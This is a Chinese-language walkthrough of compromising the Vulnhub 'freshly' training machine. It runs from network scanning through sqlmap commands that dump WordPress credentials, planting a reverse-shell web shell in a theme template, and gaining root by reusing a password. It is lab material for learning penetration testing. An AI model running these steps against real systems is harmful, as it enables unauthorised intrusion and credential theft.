Vulnhub靶机第六关

Vulnhub靶机 freshly
运行环境
Virtualbox
VM(运行会提示错误,给的解决链接已经404)
本靶机推荐使用Virtualbox搭建
说明
此靶机的目标是通过网络渗透进主机,并找到隐藏在敏感文件中的秘密。
运行环境
将下载的OVA文件导入进Virtualbox即可。
将虚拟机用virtualbox打开后设置为桥接网卡
Vulnhub靶机第六关
查看本机网卡找到对应的ip段使用nmap 扫描
命令:ipconfig /all|more
Nmap -sT 192.168.1.0/24
Vulnhub靶机第六关
切换网络时ip会改变
访问主页
Vulnhub靶机第六关
使用御剑扫描目录
Vulnhub靶机第六关
发现登录页
Vulnhub靶机第六关
使用sqlmap扫描
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 查看是否存在注入点
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 --dbs 查看数据库
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” --tables 查看数据表
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” --columns 查看字段
python2 sqlmap.py -u “http://192.168.1.54/login.php” --form --level 3 -D “wordpress8080” -T “users” -C “username,password” --dump 查看字段内容
得到账户密码:admin SuperSecretPassword
Vulnhub靶机第六关
登录后台
http://192.168.1.54:8080/wordpress/wp-login.php
在404模板写入反弹shell 的大马
Vulnhub靶机第六关
开启nc监听
Vulnhub靶机第六关
访问404.php
Vulnhub靶机第六关
拿到shell
Vulnhub靶机第六关
输入:python -c 'import pty;pty.spawn("/bin/bash")'得到一个交互式的shell
Vulnhub靶机第六关
输入 cat /etc/passwd
Vulnhub靶机第六关
输入su 尝试切换到root用户,尝试输入注入得到的密码:SuperSecretPassword 成功切换
Vulnhub靶机第六关
但是根目录下都是乱码
输入: ls -lh --color=never 乱码恢复正常
Vulnhub靶机第六关
提权成功